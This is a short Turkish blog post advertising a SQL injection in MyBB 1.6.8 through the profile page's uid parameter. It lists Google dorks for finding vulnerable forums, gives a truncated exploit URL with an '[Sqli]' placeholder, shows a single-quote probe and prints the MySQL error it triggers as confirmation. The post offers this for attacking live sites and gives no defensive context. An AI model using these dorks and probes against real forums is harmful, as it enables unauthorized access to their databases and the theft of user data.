MyBB 1.6.8 Sql Injection Vulnerability

Yazar: Unknown Tarih: 10:54 Kategori: Yorum: Yorum Yap

MyBB 1.6.8 Sql Injection Vulnerability
-====Dork====- 

inurl:member.php?action=profile&uid= 

inurl:action=profile&uid=27 

-====Exploit====- 

http://www.Site.com/forums/member.php?ac...ofile&uid=[Sqli] 

-====Example====- 

http://www.Site.com/forums/member.php?ac...ile&uid=9 

http://www.Site.com/forums/member.php?ac...le&uid=9' 


-====information====- 

MyBB has experienced an internal SQL error and cannot continue. 

SQL Error: 
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1 
Query: 
SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0' =)) 

Paylaş:

Paylaş Paylaş

0 yorum: